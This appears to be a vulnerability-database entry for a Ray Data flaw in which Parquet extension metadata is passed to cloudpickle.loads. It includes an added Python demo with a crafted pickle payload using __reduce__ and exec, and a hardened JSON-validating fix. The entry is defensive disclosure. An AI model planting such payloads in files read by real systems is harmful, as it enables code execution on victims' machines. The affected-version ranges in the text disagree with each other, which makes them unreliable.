CVE-2026-41486
Published 2026-05-08
Priority: P3 · 51 · high · 8.8 (CVSS 3.1)
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS: 0.47% (37.4th percentile)
Ray is an AI compute engine. From version 2.54.0 to before version 2.55.0, Ray Data registers custom Arrow extension types (ray.data.arrow_tensor, ray.data.arrow_tensor_v2, ray.data.arrow_variable_shaped_tensor) globally in PyArrow. When PyArrow reads a Parquet file containing one of these extension types, it calls __arrow_ext_deserialize__ on the field's metadata bytes. Ray's implementation passes these bytes directly to cloudpickle.loads(), achieving arbitrary code execution during schema parsing, before any row data is read. This issue has been patched in version 2.55.0.
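The mechanism in the description above, as an added example that is not code from Ray or PyArrow. It keeps the shape of the real code path but uses only the standard library: an Arrow field carries the metadata keys `ARROW:extension:name` (which registered extension type to use) and `ARROW:extension:metadata` (opaque bytes handed to that type's `__arrow_ext_deserialize__`). The registry dict and `read_schema_field()` stand in for PyArrow's global extension-type registry and its schema parsing, the class names `VulnerableTensorType`/`HardenedTensorType` are invented, the `exec`-based payload and the environment-variable marker are constructed for the demo, and plain `pickle` replaces `cloudpickle` (whose `loads` is the standard-library `pickle.loads`). The vulnerable hook runs the payload before any row is read; the hardened hook accepts only a small validated JSON document.

```python
"""Model of the Ray Data extension-type bug behind CVE-2026-41486.

Added example, not code from Ray or PyArrow. Names of the classes, the
registry, the payload and the marker are assumptions for the demo.
"""
import json
import os
import pickle

EXTENSION_NAME = "ray.data.arrow_tensor"   # one of the names Ray registers globally
MARKER = "CVE_2026_41486_DEMO"             # env var the constructed payload sets


class Payload:
    """A pickled object may name the callable that rebuilds it; pickle calls
    that callable on load. A real payload would call os.system or similar."""
    def __reduce__(self):
        return (exec, (f"import os; os.environ['{MARKER}'] = 'executed'",))


class VulnerableTensorType:
    """Pre-2.55.0 shape of the hook: metadata bytes go straight to pickle."""
    def __init__(self, shape):
        self.shape = shape

    @classmethod
    def __arrow_ext_deserialize__(cls, storage_type, serialized):
        shape = pickle.loads(serialized)   # attacker code runs here, during schema parsing
        return cls(shape)


class HardenedTensorType:
    """Accept only a JSON object {"shape": [non-negative ints]}; refuse all else."""
    def __init__(self, shape):
        self.shape = shape

    @classmethod
    def __arrow_ext_deserialize__(cls, storage_type, serialized):
        try:
            meta = json.loads(serialized.decode("utf-8"))
        except (UnicodeDecodeError, ValueError) as exc:
            raise ValueError("extension metadata is not JSON") from exc
        if not isinstance(meta, dict) or set(meta) != {"shape"}:
            raise ValueError("unexpected extension metadata keys")
        shape = meta["shape"]
        if not isinstance(shape, list) or not all(type(d) is int and d >= 0 for d in shape):
            raise ValueError("shape must be a list of non-negative ints")
        return cls(tuple(shape))


def read_schema_field(field_metadata, registry):
    """Modelled PyArrow behaviour per field while parsing a Parquet schema:
    look the extension name up in the (global) registry and let that type
    deserialize the metadata bytes. No row data has been read at this point."""
    name = field_metadata.get(b"ARROW:extension:name")
    ext_type = registry.get(name.decode()) if name else None
    if ext_type is None:
        return None                      # unregistered name: storage type is kept as-is
    return ext_type.__arrow_ext_deserialize__(
        "int64", field_metadata.get(b"ARROW:extension:metadata", b""))


def crafted_field():
    """Constructed attacker field, i.e. what a malicious Parquet writer embeds."""
    return {
        b"ARROW:extension:name": EXTENSION_NAME.encode(),
        b"ARROW:extension:metadata": pickle.dumps(Payload()),
    }


def benign_field():
    """Constructed legitimate field in the JSON form the hardened type expects."""
    return {
        b"ARROW:extension:name": EXTENSION_NAME.encode(),
        b"ARROW:extension:metadata": json.dumps({"shape": [2, 3]}).encode(),
    }


def demo(ext_type, field):
    """Clear the marker, parse one field, return (marker value, status, shape)."""
    os.environ.pop(MARKER, None)
    try:
        result = read_schema_field(field, {EXTENSION_NAME: ext_type})
        status, shape = "parsed", result.shape
    except ValueError:
        status, shape = "rejected", None
    return os.environ.get(MARKER), status, shape


if __name__ == "__main__":
    print("vulnerable + crafted:", demo(VulnerableTensorType, crafted_field()))
    print("hardened   + crafted:", demo(HardenedTensorType, crafted_field()))
    print("hardened   + benign :", demo(HardenedTensorType, benign_field()))
```

The point of the hardened variant is not the JSON format itself but that the hook never hands untrusted bytes to a deserializer that can name a callable; any fixed, fully validated encoding of the type parameters would do. Because the registration is global, every PyArrow reader in a process that has imported Ray Data is exposed, not only `ray.data` reads.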
Affected (3 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| anyscale | ray | — | — |
| anyscale | ray | >= 2.49.0 < 2.55.0 | 2.55.0 |
| ray-project | ray | — | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| NVD | 4.0 | 8.9 | HIGH | CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H (remaining metrics not defined) |
VulDB
CVE-2026-41486 [HIGH] ray-project ray up to 2.54.x cloudpickle.loads code injection (GHSA-mw35-8rx3-xf9r)
vuldb · 2026-05-09 · CVSS 8.9
A vulnerability described as critical has been identified in ray-project ray up to 2.54.x. The impacted element is the function cloudpickle.loads, reached through Ray's `__arrow_ext_deserialize__` with attacker-controlled Parquet field metadata. Such manipulation leads to code injection (CWE-502).
This vulnerability is uniquely identified as CVE-2026-41486. The attack can be launched remotely. No public exploit is known.
Upgrading the affected component is recommended.
GHSA
CVE-2026-41486 [HIGH] CWE-502 Ray: Remote Code Execution via Parquet Arrow Extension Type Deserialization
ghsa · 2026-04-24
In May 2024, Ray fixed a related vulnerability in `PyExtensionType`-based extension types ([issue #41314](https://github.com/ray-project/ray/issues/41314), [PR #45084](https://github.com/ray-project/ray/pull/45084)). In July 2025, [PR #54831](https://gi
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.